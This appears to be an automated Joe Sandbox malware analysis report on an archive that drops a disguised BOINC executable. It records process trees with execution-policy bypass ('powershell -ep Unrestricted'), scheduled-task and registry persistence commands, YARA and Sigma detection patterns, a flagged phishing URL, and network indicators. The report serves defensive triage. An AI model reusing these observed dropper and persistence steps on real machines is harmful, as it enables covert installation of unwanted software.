Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
527.zip

Overview

General Information

Sample name:527.zip
Analysis ID:1591248
MD5:1dc9e620c33fdac7f64b77d3d3b04320
SHA1:711b4d244f01ea086988585845a1ebd221bf12d8
SHA256:e97a452ea76479618ea4794027179a1f0d02f0c3b485c45468134386caad39de
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 936 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • firefox.exe (PID: 5932 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 876 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 1884 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aecee2f-7929-4b59-a925-084c7a102dc1} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca7b26d510 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 4516 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 2524 -prefMapHandle 2520 -prefsLen 25402 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34be315-eacf-430b-91ce-f68b9a07f9bb} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca0b1e6b10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 7384 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5388 -prefMapHandle 5424 -prefsLen 33076 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e0202d-ddff-4bd9-9b19-74adcc901a75} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca1b118b10 utility MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • chrome.exe (PID: 1388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,16268402640929927935,18277506038604385706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • 7zG.exe (PID: 7572 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\527\" -spe -an -ai#7zMap22896:62:7zEvent18695 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • cmd.exe (PID: 8044 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5740 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5500 cmdline: powershell -ep Unrestricted MD5: 04029E121A0CFA5991749937DD22A1D9)
        • schtasks.exe (PID: 3356 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • powershell.exe (PID: 2088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1 MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7776 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2872 cmdline: powershell -ep Unrestricted MD5: 04029E121A0CFA5991749937DD22A1D9)
  • .exe (PID: 4204 cmdline: "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detach_console MD5: 760F00E30887017CDEA9809FD1C38E52)
    • conhost.exe (PID: 852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • .exe (PID: 1276 cmdline: "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" -detach_phase_two MD5: 760F00E30887017CDEA9809FD1C38E52)
      • conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • .exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detect_gpus --dir "C:\Users\user\AppData\Roaming\Licensing Validator Updater" MD5: 760F00E30887017CDEA9809FD1C38E52)
        • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Other

SourceRuleDescriptionAuthorStrings
amsi64_5500.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x313508:$b2: ::FromBase64String(
  • 0x314190:$b2: ::FromBase64String(
  • 0x863b:$s1: -join
  • 0x1de7:$s4: +=
  • 0x1ea9:$s4: +=
  • 0x60d0:$s4: +=
  • 0x81ed:$s4: +=
  • 0x84d7:$s4: +=
  • 0x861d:$s4: +=
  • 0xa842:$s4: +=
  • 0xa8c2:$s4: +=
  • 0xa988:$s4: +=
  • 0xaa08:$s4: +=
  • 0xabde:$s4: +=
  • 0xac62:$s4: +=
  • 0x8d2b:$e4: Get-WmiObject
  • 0x8f1a:$e4: Get-Process
  • 0x8f72:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102, CommandLine: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102, CommandLine|base64offset|contains: , Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell -ep Unrestricted, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102, ProcessId: 3356, ProcessName: schtasks.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -ep Unrestricted, CommandLine: powershell -ep Unrestricted, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5740, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ep Unrestricted, ProcessId: 5500, ProcessName: powershell.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5500, TargetFilename: C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5728, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 4048, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://rosettahome.top/rosettahome_cgi/cgiAvira URL Cloud: Label: phishing
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_03cc715d-e
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.16:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49788 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49791 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49804 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.68.240.115:443 -> 192.168.2.16:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.68.240.115:443 -> 192.168.2.16:49817 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.68.240.115:443 -> 192.168.2.16:49823 version: TLS 1.2
Source: Binary string: webauthn.pdb source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: wshbth.pdbGCTL source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wshbth.pdb source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: netprofm.pdb source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdbUGP source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdbUGP source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\boinc\boinc\win_build\Build\x64\Release\boinc_exe.pdb source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmp
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: firefox.exeMemory has grown: Private usage: 0MB later: 278MB
Source: unknownNetwork traffic detected: DNS query count 34
Source: Joe Sandbox ViewIP Address: 151.101.129.91 151.101.129.91
Source: Joe Sandbox ViewIP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox ViewIP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Jan 2025 19:46:34 GMTServer: Apache/2.4.52 (Ubuntu)Expires: Mon, 26 Jul 1997 05:00:00 UTCLast-Modified: Tue, 14 Jan 2025 19:46:34 UTCCache-Control: no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1512Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 19 5d 73 d3 38 f0 bd bf 42 18 ee 5e 38 c7 49 e1 3e e8 39 61 7a a1 43 cb 94 36 d3 16 18 ee 25 a3 d8 1b 5b 45 b6 74 92 dc 90 fb f5 b7 92 ed c4 4e 93 52 38 33 25 d3 c4 96 b4 da ef 5d ad b6 e1 a3 57 e7 e3 ab 8f 93 23 92 9a 8c 8f f6 48 f5 09 ed 90 70 9a 27 43 0f 72 af b9 00 34 2e 87 eb b9 0c 0c 25 39 cd 60 e8 dd 30 58 48 a1 8c 47 22 91 1b c8 cd d0 5b b0 d8 a4 c3 18 6e 58 04 be 1b fc 42 58 ce 0c a3 dc d7 11 e5 30 1c 54 04 f6 c2 47 be 4f 42 1d a5 10 17 1c d4 28 35 46 1e 04 81 12 1a 8c a1 a9 c8 a0 67 84 6c 8e a7 51 c2 02 fc 86 c1 7a 17 f1 fd d1 5e c8 59 fe 89 28 e0 43 6f 26 58 1e 4d 57 eb 1e 49 15 cc 87 de fd 91 37 e5 37 cc 70 18 5d 1c 4d 4e 0f c7 47 e4 c3 c9 d5 31 99 5c 9c bf 39 1a 5f 91 b3 c3 b7 47 61 50 02 ec 6d 68 27 4a a9 42 bc 43 af 30 73 ff 0f 6f 43 83 0e ce 31 6c 96 12 b5 68 e0 b3 09 22 ad bd 52 00 6d 96 1c 74 0a 60 ee e0 3d ca 9b c3 20 98 09 61 b4 51 54 f6 32 96 f7 1c b2 0c 62 46 87 1e e5 bc 21 d1 5e 9b 01 4b 90 72 03 2a a7 06 2a 76 a8 94 9c 45 d4 30 81 34 b4 7e fa 39 e3 1e 71 72 0e bd 8b cb 4b b2 df eb df 9f 31 44 30 cd 28 b2 24 53 d9 54 6c b0 f6 ac 70 26 e2 25 19 95 ee 70 f9 fe 8c bc 3f ba b8 3c 39 3f bb 2c 2d 6b 67 9f 9c c4 4f 5a a3 03 22 b3 1e da 99 0c 9e f7 07 2f c8 7e bf ff bb 3f 18 f8 fd 01 d9 7f 76 d0 7f 7e f0 ec c5 df 24 a6 37 40 c9 93 3b b0 74 3a 8a d9 0d 89 38 d5 7a e8 d9 60 40 99 41 f9 73 5e b0 b8 92 3b 64 59 52 43 e0 ab af 40 4b 91 6b 76 03 1e 71 36 af 82 e7 60 d0 ef ff 84 53 2a 72 70 c1 02 4d a3 7a d7 32 f1 46 61 4e 57 44 f0 75 46 15 29 1f 7e 0c 73 5a 70 e3 39 57 bc 07 2f 0d 88 0a 83 35 08 86 4b 6d a3 70 56 18 23 f2 ca 27 ca 81 b7 b1 c5 88 24 e1 c8 7d 4c 0d ad 06 96 20 e7 54 ea d5 34 55 89 8d 84 c7 d9 f2 cc ed 6a 7a 81 96 34 5f a9 04 39 f5 dd 3a 46 37 ce 7f 1f b0 30 28 45 59 8d e9 86 4c 33 45 f3 b8 f2 ef 2f bb f7 5d a9 81 56 aa 0e 50 d7 b7 b5 5e ab a9 36 e0 5a 6d 2c 1e 7a b7 94 15 16 bc c1 68 bd 09 1f ed e4 82 51 5d 83 c5 4a c8 58 2c 5a e9 9c 6e 2e 6e 37 e1 6a 6b 15 e6 8f bd d1 44 89 6b 88 cc 76 65 47 54 61 b2 aa 35 bd 92 7c 83 ef 15 cd 0c f2 a2 f6 43 ce 46 c8 d5 7d b3 09 9d 89 c2 94 a9 e4 d0 be 92 3b d5 1f 06 88 7d 33 eb 7e 0d b9 05 f0 c8 4e 3b 82 c7 c0 e5 76 ac 8d ac 56 f0 b5 a3 d5 60 df db 34 63 91 c9 c2 b0 3c 79 60 e3 48 84 d3 56 57 2f 75 31 b3 a7 5f c2 c5 8c 72 eb 3b 30 07 05 79 04 ba 13 b3 68 50 37 a0 a6 da 50 53 e8 d2 38 97 6e 8a 94 53 dd 10 41 54 15 f2 b1 c2 93 d4 38 e4 4c 1b 16 75 43 00 8f d9 0a ff e1 fa c0 ed 06 75 22 8b 29 47 56 4b f4 af 27 ef 48 26 62 e0 dd 20 8f 5a c8 c7 dd 22 4f 85 36 d3 a6 ea 9d 6f a3 65 ed 31 b4 83 c4 c3 87 5f 56 60 81 bb 7c e0 f0 9b 0b 55 64 53 96 c7 f0 b9 d4 dd 5b d0 9a Data Ascii:
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Jan 2025 19:46:41 GMTServer: Apache/2.4.52 (Ubuntu)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 908Content-Type: text/xmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 56 c9 8e e3 36 10 bd eb 2b 88 39 e4 d8 e2 a2 85 1c a8 95 43 ce 01 72 0a 90 93 40 91 c5 b6 d2 b2 a8 90 54 2f 7f 9f 92 2d b7 ed 71 9c 64 d2 a7 08 30 a0 da 58 ef 15 4b 55 6e a2 d9 81 5d 46 08 5d 80 79 7c 6f b3 e6 ac 79 81 10 07 3f b5 92 b2 26 bf 55 67 8d f5 53 ea 96 08 9d 35 2e 47 79 af 63 42 87 25 8c ed 2e a5 f9 6b 9e 07 1f 21 25 bd f3 7b 78 30 d3 a5 98 37 f9 85 7b d6 04 f8 63 81 98 3a 0b a3 7e 6f f9 03 3d 3c 4d 7e ad c7 1c 10 a3 7e 02 32 87 c1 87 21 bd 3f 7e 19 fd eb 97 f6 97 e0 7f 07 93 c8 4e 47 32 79 92 74 7c 8e 44 bf e8 61 d4 fd 08 98 eb 18 86 07 cc 47 cf 6e d2 7b 68 2f 00 35 f9 95 25 6b 26 78 4b 5d 98 cd 96 5a 50 fa 01 ea 1b 53 d6 60 11 c2 60 5b ac d3 f6 76 54 5d 25 49 48 e3 68 3f 65 38 bc 27 9f f4 d8 99 00 76 48 ed 39 c5 ad 6d f3 87 b7 59 bf 3c dd 09 b8 36 6e 11 28 61 f2 2e 0d 98 94 d5 4c 16 a5 52 54 6d 11 97 c6 ac 81 3d 56 ac c3 22 ee 5a b0 56 c9 de a8 be b6 ae 72 06 68 c5 a4 64 25 58 2a 84 ae a4 6e f2 0b e7 ac 31 c8 32 76 a7 12 62 05 78 6d a9 64 95 83 ba 2e 0b 57 d9 52 96 42 58 55 41 6f 55 2f 54 d9 e4 37 21 98 ff 0d 3b 62 5a 39 cf 28 3b c1 a9 a4 86 ca 5a 53 c7 6a 4e a9 a8 95 91 a5 04 d9 17 42 0b 84 70 e5 9f 65 cd ce c7 b4 5e 04 3a 63 86 4d 3a aa ef 55 fa d6 b6 f9 df ab f4 5f 18 b7 88 17 98 16 68 37 8f a3 b0 59 ae ef 40 54 52 16 74 fd ac 6e 8c 59 93 40 ef 8f 1d d2 e4 e7 77 ac b0 b7 d0 c5 e1 69 ea 9e 01 7b 8e 51 5e 64 7d 6d a4 d2 58 5d 0b c6 14 94 31 e6 ac d4 15 e3 b6 d7 42 59 69 59 dd 57 94 ca ca 29 65 1d 2b 40 f2 92 a9 c2 38 0a 1a 6a d3 67 5c 0a cb 95 12 52 d4 bd b1 42 21 28 ce 99 93 46 a1 c2 19 8c 02 0c 05 c1 28 08 05 ba 2c 8c 62 25 2d b5 53 ac d6 46 9b ac c0 6f 9f a1 6f 6f b5 2b 6a 5b ba 5e 20 26 ba 5e 96 72 5a 80 00 5e 00 13 4e 08 5e 52 2b 57 18 dc 55 8a 73 a1 aa b2 ac 75 a6 59 6f fb 92 73 c3 59 59 d0 da 08 55 4b 51 51 6e 4a 5b f5 42 33 6b 64 55 40 a9 64 a5 7b 50 86 21 8e a2 47 b8 ca d5 c2 71 23 32 fa c9 e7 ff 7d 00 5b 7f d9 43 86 9f d3 75 7f 34 4f cb b0 ce d6 d8 66 04 9f 93 78 94 0e 9a 43 5f fd bc cd d3 de eb 60 23 8e b6 43 b3 7d f8 58 88 26 0c 73 5a 07 fe 4f 3e 04 88 b3 9f 2c 79 1d d2 8e f8 b4 83 40 d6 29 12 89 9f 08 4a e4 62 9e 92 fd 37 27 5f 1e 75 4e f0 ef 96 85 f3 61 d9 77 c3 64 e1 ed 61 de cd 38 bb 4e 4c 9a fc 8a d8 3d 9a bf f9 25 10 6d 8c 5f a6 f4 b7 24 7f 1d e0 95 bc 5f 78 93 61 c2 ec 7b bd 5a 3f 47 e2 a0 fb ef e8 0f 3b ed 9f b1 af d7 30 e2 66 25 af 00 cf c4 07 12 3d f1 8e 18 bf 9f 97 74 60 a1 47 f2 ea c3 f3 e7 c8 60 27 2c 63 8a 2b 9f 1f 8f 3b ef 